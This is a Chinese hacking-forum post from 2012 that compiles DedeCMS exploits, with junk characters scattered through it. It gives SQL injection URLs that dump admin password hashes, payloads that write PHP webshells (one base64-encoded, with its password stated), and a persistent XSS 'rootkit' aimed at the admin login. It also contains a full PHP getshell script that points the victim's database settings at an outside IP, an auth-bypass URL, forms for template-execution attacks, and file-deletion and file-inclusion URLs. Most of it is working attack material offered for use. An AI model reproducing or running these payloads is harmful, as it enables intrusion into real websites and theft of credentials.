找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3088|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

  {- y% ?, K  H. BDedecms 5.6 rss注入漏洞
9 z* G- r$ G8 w3 w
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1/ p! y0 c( D( ?& `/ h- U0 p, W3 e
+ {7 T, f# y% v% G& P

2 H8 R% l& ?+ F2 d% ^' b' r+ H' O) k) Z

! j) l7 p, W# ~7 h# W7 y9 n. L' Q
3 A7 Q! T4 }& c6 v2 T7 k9 A6 [" k$ X$ }+ n# E2 X
$ C6 h) B; _$ V1 f% I- d) ]( t: I

4 P+ K! T6 ^: J% PDedeCms v5.6 嵌入恶意代码执行漏洞
9 `" h- W3 n3 ?2 ?1 T* @* U注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
, [5 Y8 M. Y9 ]2 a( j8 J发表后查看或修改即可执行
/ U" Z' [$ w& _) k; {: \$ `a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
. V& m3 k, l0 y& c$ t) l4 G. o生成x.php 密码xiao,直接生成一句话。! j3 E5 q0 ?( S4 _2 @% H# t9 U
/ M7 ?/ j- t8 |/ Y8 |

& e& R/ G8 s; j+ q! R  N
5 `. v! V8 W* a$ j- |+ x, Y: w$ K8 s
& X7 g' |- w- j; U
% b2 w' i1 c+ E% m4 t$ I& P0 Y

/ K4 i) [/ B, _$ |( U' q) F1 F/ Y; a3 t3 u( c( E) X
Dede 5.6 GBK SQL注入漏洞
5 _5 ~' A* g, h; S9 h
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
4 Y. [$ p  E7 ^! s- a
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
& @5 `9 Z/ ~/ |( }' Lhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7! ]+ l/ j5 s% j8 f

$ R1 C! A: f. B7 G, X: L+ Y4 j* z! p0 A; F% o
! {) A. n9 P# K  C

$ u2 F8 ~- A/ q/ k  ~2 p- d* j, G6 V+ O1 a

) `' z% b& y0 N& R  o3 [+ i; ^5 t, N0 m5 p% x
; m8 j7 |! u7 g5 A$ h8 N+ D1 G
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞: M% q' L( L- x* J/ L2 U0 @
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
8 V3 \) P8 e) ]
6 M( j+ ?3 H- P* W+ i# ]1 T' v* c- W1 v  V- \0 J% C
3 j! m! _" N3 h8 z9 c& B1 w

1 q5 U! o( u' {, k3 T  v/ Y' _; p9 s$ |! j* p8 g6 e2 o" h! N2 T
7 l* f6 n$ P/ K
DEDECMS 全版本 gotopage变量XSS漏洞
6 \6 n6 B: V  c7 ^. E1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
- Y) _4 N3 N% ]- W0 a3 E
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2 w* O. `& V4 Z* m2 H5 O
- o& u) z2 b! I( D2 n
, O% e0 [/ ]8 l  l$ P, r) s2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 8 z8 F5 {* t; Z- c6 j0 v; s$ N
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
% t3 r5 A* U# `6 X4 E, e/ b$ q; }9 p4 z
/ N  P7 K. J$ A. G
http://v57.demo.dedecms.com/dede/login.php
7 K8 l, ]$ w- \
' [& D' q) |7 H& W% D
5 R6 `: j  q- Q% C" Gcolor=Red]DeDeCMS(织梦)变量覆盖getshell" h/ n* w( X9 c+ W/ h, n$ Z  h
#!usr/bin/php -w
0 b/ A8 p. O3 S4 e<?php# I$ F: h/ o# ^4 q1 B& {; K+ p
error_reporting(E_ERROR);
2 {4 R) L. K6 C6 b) Wset_time_limit(0);% W: z7 b5 t1 w( F/ c
print_r('
6 E+ v; Y) X! {) l4 @& G; nDEDEcms Variable Coverage1 Q5 `) G, v* {) V1 Q$ E
Exploit Author:
www.heixiaozi.comwww.webvul.com5 ]' H& C  k* ^4 Y2 e6 G
);
' }7 |# v6 E7 [* Cecho "\r\n";2 v5 d7 Q6 h) J
if($argv[2]==null){- y# \9 y# t' c% [" R
print_r('
3 h0 }" j* q3 @# m9 Z+---------------------------------------------------------------------------+
9 s) u+ Q  g( k  A- z$ }7 TUsage: php '.$argv[0].' url aid path
' y6 }2 G. @( X8 H6 Iaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
. F9 c! e- E2 C# B' f6 f& |Example:
. c; l# x- D& Sphp '.$argv[0].'
www.site.com 1 old" h# ~, x; d% g# ~! {- r+ W4 M# u
+---------------------------------------------------------------------------+! |, b7 v5 r2 E/ R% \# f8 ]5 C
');7 C: m- ]6 q* ]& s
exit;
. k6 w( `9 u- [: u}0 u0 [. M; S+ W9 Q
$url=$argv[1];
5 E- t* V! G+ _$aid=$argv[2];) x# `- [: D2 C0 U- s8 B
$path=$argv[3];
1 N, ~' U/ z9 c! P; C! M$exp=Getshell($url,$aid,$path);6 v/ O4 I4 ?; [. [8 D! J
if (strpos($exp,"OK")>12){3 u1 X* A9 S8 d( M4 F7 c
echo "
# Z1 [; o& v: ]5 }* i, @7 G8 i+ Q0 jExploit Success \n";5 B/ S$ e& F# h2 R+ o0 g
if($aid==1)echo "
' X: r1 m  [1 C! VShell:".$url."/$path/data/cache/fuck.php\n" ;
) y4 C  r6 s' N2 @. T$ G" ]# p& n( F) F% S$ u4 c
8 g- u6 g* ^' E* m! {& u
if($aid==2)echo "
5 Z' X* M( b5 X( x' }& YShell:".$url."/$path/fuck.php\n" ;2 I5 _5 T' W& I; X0 Y

6 {! ^  c) Y9 s2 j. H
* z9 Q, ~8 Q8 u3 R3 m5 N/ @if($aid==3)echo "
% R# @* A4 b: U' G( I2 rShell:".$url."/$path/plus/fuck.php\n";9 T, n5 r/ x1 A4 O$ z: @0 _
& N! j: ]4 a0 g6 V; X# ]
3 i5 n3 `( x6 C. r# b
}else{
+ K8 ]' ]% ^) j  ^' Recho "4 ^& y7 j: U! _) k: H: F
Exploit Failed \n";
& \5 m, j- a0 w2 @, B}
4 J, v# Z; ]1 c9 |1 W" rfunction Getshell($url,$aid,$path){* ~) Q# |! L& W; w- t
$id=$aid;
8 _" O" T/ Q2 G( S$host=$url;" M0 f' ^& T4 G" F
$port="80";
$ u  L9 L/ ?3 O5 Y: r: X; V/ N1 d$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
! t- X) o3 }/ ?( @0 h( c+ F7 @$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
' x: U9 s, s: j$ Z) H: C$data .= "Host: ".$host."\r\n";
4 r2 A5 Z+ j4 ]" }9 \1 F7 x9 x$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$ T+ F% o* ]! t; }! p" w/ B4 n$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
0 J  L2 X0 a0 s3 Z6 E$ x$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";  T7 q: Q- {4 y5 y0 @6 s5 h4 A
//$data .= "Accept-Encoding: gzip,deflate\r\n";
! n% n! |$ v) d, ^& O1 C; S$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
5 N( z/ i2 c; n& N* B0 L% L  I$data .= "Connection: keep-alive\r\n";! z$ T5 [9 D) H: f3 Y! m; i3 j8 g
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
4 Z. {# G2 A" N& y7 I$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
3 b8 N; i5 w3 D$ _* ]8 S% f; |$data .= $content."\r\n";1 `: }! `# Y# }! s' T5 K: ^# n
$ock=fsockopen($host,$port);
+ L7 @- q. D5 l1 G  _  {if (!$ock) {) M1 J  q) Y6 l9 x4 P: H4 L
echo "6 V: l& c& Y1 Z' n( c$ n
No response from ".$host."\n";
) z8 @  ~! y' m4 e% D}
  h1 a6 ~' p7 p4 T" Yfwrite($ock,$data);
  b& R( Q) P+ `while (!feof($ock)) {
) w4 {: C& i. s! T7 |$exp=fgets($ock, 1024);
$ [3 E* E9 p; yreturn $exp;
3 h, P# l; f' K; e4 d}
0 g- G9 ?' G2 q/ ]# J8 ~}
. D8 ?' |3 a5 c( C3 ~8 ?# |% K9 D1 v/ }2 J* I+ q5 Z
+ }/ g# y! L. U- V- G
?>4 T% z7 H/ k* ^4 N' C% f0 `
* Z; e: k) S. G5 I( @
- M% n5 Q; ]4 Q( E1 t" }  B

* i6 s$ k% u7 U/ S. G' s! j; P3 N+ U. k  C2 S/ d

) E8 J/ W! Y. f. T* V  s# d& [0 Q+ G! b) S* n; `

; c; y* V$ g% ]" s
* C+ o$ J* U, ^* J) [- j* R4 |  a0 C' ~

, L. f8 S2 M1 F9 s4 m; u7 e1 NDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)% i& R+ c. y* I5 n/ J
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root  z8 V) H; B1 U  r0 i& P1 o) d

- a2 Z# o4 N! h4 k- C
7 B0 a3 ~8 E% H把上面validate=dcug改为当前的验证码,即可直接进入网站后台- `# Z3 M9 o- J: t% _7 x8 p" K
, G, ]$ }+ g! d: D' V. M

4 m( C1 ~3 r* z% {此漏洞的前提是必须得到后台路径才能实现
% }+ N' L, E- _" B1 M5 `
, P+ p6 l% G2 ^3 |
4 n. a. h8 b+ r! @1 p* |: {, q
% d+ m! J8 M. J* K
5 u8 @+ \' ~4 C+ Z# C& P3 _: D* ]: Y' Q; P$ U1 q

% S2 g$ }1 l; n
/ Z& t: M. J/ y+ t3 C
% O6 p1 J- F. {! |/ @  L9 K, w" G" @% \

: a* a/ C+ y) p+ SDedecms织梦 标签远程文件写入漏洞
( J, V  \5 w; S2 A) y. }; Z前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');8 V, M! }! D( S. z: U! u+ T4 Q
. P0 P8 y6 x+ K6 M6 p
2 Y! S6 m4 Y7 o; {, B0 U
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
! h  t' [: H' J/ h$ u0 @+ E<form action="" method="post" name="QuickSearch" id="QuickSearch">! e* q7 ~8 y. ~  J
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># M0 ?0 r8 Q1 J. k; N& N
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
* d  [: |6 T0 p<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />3 t; @9 I& q' @# s1 [& ?/ C6 Y2 m
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /># U# l* ^9 C! S- N9 ]4 Q! M
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />! {7 L  {+ a; y. [: i7 z. r! a' g
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
3 Q6 r7 Y2 X/ C7 i3 M<input type="text" value="true" name="nocache" style="width:400">. ^( m7 l  W9 c, M
<input type="submit" value="提交" name="QuickSearchBtn"><br />$ i& W+ N$ L2 @; o2 p2 ^4 M0 X
</form>
! ~4 _$ M1 z4 y, Q8 c& g<script>
: N7 l; \# G5 p% c8 x9 n  vfunction addaction()
7 [, h6 F, s$ J# W! U{$ ?2 W; y6 K, N( e$ H
document.QuickSearch.action=document.QuickSearch.doaction.value;$ X0 @0 }7 r0 x7 c* l) u5 e
}) y0 f$ \- d/ ]$ h, o- W
</script>
0 i+ {* ~- f& L) ]3 n1 H
& f6 F. I9 Q2 g6 U' F- ~) b% j7 n$ S5 T( y4 \1 Z7 Q0 y4 e

6 d3 N+ e" ~$ ?
9 U# K- ~4 Y3 n" g" J3 n7 P$ Y- c5 W& [; W' y3 q+ ^# c

; h1 f1 M! x8 K) f5 F; x1 b# D5 w3 {* g2 U- r3 ]: F
! B* k) A0 y5 ~8 {' c7 ~

3 q% S8 P: n; ?( |! T+ _8 A) Z
1 e+ {) i6 f1 B: }& |  `+ }$ zDedeCms v5.6 嵌入恶意代码执行漏洞
, v" d' \( }7 A) s5 V; ]: E注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行# B. v0 s/ s) y7 d& t$ u. y
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
# P6 U2 a' {6 h/ D% Z5 |生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得2 e1 V% \( M8 M" N0 D4 P3 R
Dedecms <= V5.6 Final模板执行漏洞0 ~: ~8 J$ s+ y" X* Q# q
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
8 g) ^5 @/ {- P3 buploads/userup/2/12OMX04-15A.jpg
0 H3 n& y2 r- B! M, D* q2 B
! O3 `" {1 Z+ n+ n6 n" n( |( B- ]2 N
模板内容是(如果限制图片格式,加gif89a):$ b- S7 Y. U9 o& S0 j: j4 @
{dede:name runphp='yes'}' o; y& h' ^1 S8 H* p' y
$fp = @fopen("1.php", 'a');
' T. e+ \( I8 y4 l, h, |/ d@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");" g; R. Q/ c0 P! I0 W; L
@fclose($fp);
& }4 I& {# I% [' b$ H5 @{/dede:name}
9 ?( R7 E4 v6 m7 p2 修改刚刚发表的文章,查看源文件,构造一个表单:& q; X/ f7 K$ C# L5 a' M
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
* }5 q: Y/ O) K7 {* M7 F) j<input type="hidden" name="dopost" value="save" />
$ a/ x) c; {* E/ u<input type="hidden" name="aid" value="2" />; d. m: [$ i8 H) W! L* l
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
( ]( m2 B7 ^# @5 u<input type="hidden" name="channelid" value="1" />
! [+ j# a9 x5 A' k2 i+ E3 }<input type="hidden" name="oldlitpic" value="" />
9 H( T) [) L9 |9 h<input type="hidden" name="sortrank" value="1275972263" />7 ~0 r6 g8 t6 [
$ ?) d3 E% J- Z/ f7 W, c+ |+ N
4 X. ]1 m& Z, T: L7 \
<div id="mainCp">9 x/ J" V0 R2 b; v
<h3 class="meTitle"><strong>修改文章</strong></h3>  O: I- a2 p+ R( ]; N# ]
5 |& ?, |. M1 w+ O, ]3 j8 L% I0 y8 t

/ ^; c. S% G' ?+ j: `; `<div class="postForm">
! C' `3 Y1 h* }( Y4 z- o% h<label>标题:</label>8 B9 ~& L7 q% |
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>* A- G4 `5 {* X) C
% G0 w; W* l" T( g6 Q8 w
' O# T; v  Y  H6 ~% v
<label>标签TAG:</label>' e& v0 P1 j2 D3 e$ C8 \. w
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)7 u/ ]+ M& [4 G, e/ E
8 X$ {% c$ _! K! t6 J: m
. D' `7 x4 B  _& `& }6 p1 t
<label>作者:</label>
5 z& U0 R  |& H0 v# E<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>( j& }; i+ B* i6 c8 w1 X' b
7 s( ^/ |) K6 x" S) U, ]
( i0 D5 P# z: m; o$ ~' Q
<label>隶属栏目:</label>- l2 X. R, V; z
<select name='typeid' size='1'>
. [! g5 s* t- }  |- H& C2 u8 l3 a' b<option value='1' class='option3' selected=''>测试栏目</option>! G8 @+ k, r, X2 b! x
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
7 m& |# A, L, O
  C& A, q& R/ C; |" h
8 _3 j( q& \5 T6 n3 f4 ]<label>我的分类:</label>
$ N$ x3 ]# H0 k0 ]& u3 m1 O& w<select name='mtypesid' size='1'>
, K( z: d; m; _8 l5 \1 `<option value='0' selected>请选择分类...</option>0 W. q; k( R5 R: t: P6 K
<option value='1' class='option3' selected>hahahha</option>- a# ~/ M4 k: ^. J# j4 q7 ^
</select>; ?- z* }( p7 {1 i$ g. B) m
3 ^! ~# ^; J- p  @& v
$ _& O. P7 w1 A4 I* }
<label>信息摘要:</label>
  }2 ^  ~5 a$ G* M, F# T' R* }<textarea name="description" id="description">1111111</textarea>
. B& \9 ?5 j3 M. X5 f( R(内容的简要说明)
* g( Z9 i  `4 i2 A6 b+ T; Z( V8 B' Y) x  A- ?

2 ~0 u7 S, g. t% B" z<label>缩略图:</label>$ V* [, o& l; a
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
+ t* v# u! n2 d* u- b$ c9 e1 L% K' o. N5 {

3 N7 T! B# h8 J<input type='text' name='templet'( n  M( Y& S$ E$ M" J& n; L) q
value="../ uploads/userup/2/12OMX04-15A.jpg">: U" g1 ^+ f; R) y! ^
<input type='text' name='dede_addonfields'
  P" N" E. b6 O4 Ivalue="templet,htmltext;">(这里构造)
- s1 |8 l/ ^7 |2 O4 `</div>/ |9 u! L) _* g5 u3 }

1 N. m0 i, P- w; a9 i" ?
2 Y8 o; ]% U( E! S6 q' I7 t0 ^<!-- 表单操作区域 -->0 w  ?8 Q) _% ]( G' X, E2 f
<h3 class="meTitle">详细内容</h3>! a$ t8 k& c/ c- f, W3 p3 ?- {

9 C5 H* K: F' P" B4 w4 m+ h8 a$ v# L1 J; o2 \7 n5 d8 f/ A
<div class="contentShow postForm">
4 U# V' s* a5 V% }& R( t4 g4 \<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
. u  U$ M( V6 o, n
# w+ U8 `: ]" q1 z9 B3 B7 u/ @# ]/ x; l; x5 w% P
<label>验证码:</label>
4 P8 a* X% g* b+ e, E0 O0 W<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
) m+ f4 q: {) \' A<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />! N) b$ W. s  v0 J$ v7 y
5 T4 P* |5 @8 S& _$ _

( W+ {) o7 j0 T, s<button class="button2" type="submit">提交</button>
3 l3 [- S1 u7 G2 H9 r/ k<button class="button2 ml10" type="reset">重置</button>
0 h+ G3 |; y1 ~</div>
! T7 w/ h9 M0 \1 H/ |: C
* z9 U0 P- B- W8 k: w4 A1 O/ s( Y
</div>0 \5 |+ j8 d' U4 p2 R9 F

7 C% n- L/ j. g- p& N" |8 R, w; Y( S/ N7 n8 c3 D8 V# j% e( Z
</form>) k$ I" R4 B/ j4 A" T0 h
4 b1 L( k& c. |8 T+ r; q. g5 b

3 z- U3 ~  |8 c& R; x  d+ {4 J: j提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:4 U0 s4 o8 `' k0 v
假设刚刚修改的文章的aid为2,则我们只需要访问:
+ M0 L. L- f5 s- |( B
http://127.0.0.1/dede/plus/view.php?aid=2
6 K2 O3 m/ X; q3 V; \: o即可以在plus目录下生成webshell:1.php* G/ k' y5 f- e& l( |
7 V. A' L- H- Z) {# \6 W0 M

  @- _1 M! M+ a: `2 W" ]7 k
# V0 @% H# H% V( S" Q$ Y- C/ U2 z( o5 j- X

9 R* h3 m% l; V7 z1 @& J; R
9 y, _2 U, n* D. s' m4 b2 t/ X9 y. U( ~2 A
; Z# [# _6 W% C. a# U( p
  w& U' _  ]" U' ]$ q, x+ T
. F4 v7 c% S- n" }. v# j
  s! w7 _8 _: o8 Y, G% G

/ \0 v/ K9 @& t9 Y1 \. TDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)' H, P4 k+ `' i2 p1 a. t% U" G
Gif89a{dede:field name='toby57' runphp='yes'}: z! x- A9 L7 b* E6 w
phpinfo();% b  H0 T' Y5 ?
{/dede:field}! u8 Q; n! `1 B4 w5 y! L8 |& Q
保存为1.gif# K2 K8 V8 v# u* V
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> $ B! _$ b, W4 J& l- N: l) h
<input type="hidden" name="aid" value="7" />
% @% ~  {) F+ v1 g3 |<input type="hidden" name="mediatype" value="1" /> " b8 y9 ?7 G( z% R  P+ x# ^: A; p, p7 z
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
: t. T# y5 d; N<input type="hidden" name="dopost" value="save" /> 7 [$ Y, j0 S! u3 O- ?
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> " w, k6 A- d2 _7 `- U: \
<input name="addonfile" type="file" id="addonfile"/>
6 Z" \4 f( A( ^+ |- `8 z  O+ D<button class="button2" type="submit" >更改</button>
2 W$ @1 Y2 Z6 u9 \" e7 t0 n+ P/ w</form>   c& T' j* B: W8 U

5 q. o( T1 u# n1 i8 k: X
! n, }8 m6 \7 ~! w; q构造如上表单,上传后图片保存为/uploads/userup/3/1.gif) }* r) ]( E2 d6 y
发表文章,然后构造修改表单如下:5 c$ s3 u6 w5 v' a# M6 z

5 g3 _0 L# ~4 P& `( g, C( V
) w4 |1 v0 e  b9 r: e) U; i<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
  m, h7 K) i' T7 q" Z& R. D+ o! A1 \<input type="hidden" name="dopost" value="save" /> ) m; n$ p7 ^. Z' n
<input type="hidden" name="aid" value="2" /> & U( [; O4 l) m' m
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ! \, m: i% d1 i' E" T4 A8 z
<input type="hidden" name="channelid" value="1" />   R' Z1 V$ h2 _2 q
<input type="hidden" name="oldlitpic" value="" /> ' k9 l1 i: Z* x4 @; f
<input type="hidden" name="sortrank" value="1282049150" /> . s) L' v* z5 B0 u+ V& [% E
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> - }! w  c/ P4 C5 i9 D, F" U5 j0 n# P
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> - v, |3 `+ \8 ?& t/ F
<select name='typeid' size='1'>
9 }) J# R: b* [& K3 Z' Q% D<option value='1' class='option3' selected=''>Test</option> ' s1 J$ m9 j8 h  P$ p: N
<select name='mtypesid' size='1'>
5 D' g5 c) q; h7 X* D  P5 s6 ?" x* x8 s<option value='0' selected>请选择分类...</option> 9 }3 J) H3 e- s+ I" p! K2 e. w
<option value='1' class='option3' selected>aa</option></select> 0 z. I9 R7 B7 K9 U
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
6 Y, _! c8 x! P7 u1 K  c3 w<input type='hidden' name='dede_addonfields' value="templet"> ) w  h. W5 o* C: k, l
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 5 {5 A' L) ~% {! J- u3 S
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 3 [! w4 j- G9 P2 ^8 M
<button class="button2" type="submit">提交</button>
  D) u; f2 w  H</form>  C! e8 F" j% R0 E: E, J: s- u
: \$ v) I9 y& B% o+ B+ m
0 {  K. l( B6 Z, E0 D

% B3 ~1 U! ]* U; Z4 x
; O; `3 x) H" a* V
! V6 ]% h4 [1 [& R9 n
# ^5 g1 d, D$ ]: S( ]/ B+ n4 T. K( P( P" K
5 F5 P3 I* ~$ R, L% G$ h2 N0 [2 p3 }

6 q4 \" q: K+ w. s8 ?/ c# {/ w; J! f, a

9 W! j2 k/ [+ J; Q# w
8 A, G5 r8 F' X- t4 {( y" ]织梦(Dedecms)V5.6 远程文件删除漏洞
- n' `+ s7 ^, l) B8 D
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif0 k0 D) q5 |! a" Z+ H  _
, o* V3 W9 x5 j6 |$ b
8 ]# F3 h8 E( G2 I  n  `5 u" [

* G3 [/ f8 E" {& F8 a4 ~2 [3 i: X

! o( L, j0 w0 ?* p
/ A: d0 h; ~& M6 g' D7 |1 f  ?3 h% t0 M4 [( u- p

; B, A$ u2 S) y: W
9 u0 b# v2 Y+ @6 b* ^
& h5 g3 h" c1 [织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
9 |/ @: X% h3 |$ T6 g
http://www.test.com/plus/carbuya ... urn&code=../../3 a& L, L5 R2 L; O

. c4 j+ y" E, x( Q
* E9 h7 q6 M+ z: ^* b- l- ~6 ]* q# ?8 E. y4 [! s, W5 i( l
" }$ c9 A- ]* v$ W, {' j

. i$ x' A8 m& v2 }( X, r+ Q& j$ f3 g7 N8 z2 h8 |. l5 w
! H0 t% G  F2 S) k4 Y$ b' F( g
2 H0 ~% a8 f0 g

& r- o) _# n4 x3 N# N' J8 d& z5 V8 [8 z3 c" o
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) k, l# s" m, v+ T1 M9 Z6 V, _plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
8 s7 U9 y( U' p0 w/ e密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5/ \+ l1 H2 i3 u2 F
0 J8 H, W8 W$ C% Q8 k5 V4 ~3 l: g
0 c+ _% x8 H& U% y

: P" H8 o8 W5 o- A+ n- _0 h+ y- E4 E0 e) G+ _# R3 b& v% E
+ n# l1 s& x4 Z2 c/ H+ O) x3 C

1 k$ E% Y# f, T) k) n5 b, y
$ g8 Q, E  _& q- c
. k' W9 G+ {, e+ J
6 S0 v7 D5 D" E: Z; I
5 H  Y5 C5 A8 Q5 I+ `" S织梦(Dedecms) 5.1 feedback_js.php 注入漏洞' I1 h* z( }, T: |
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='. p/ f. _9 g3 O# ^
6 m) _' h' L# |" D$ U
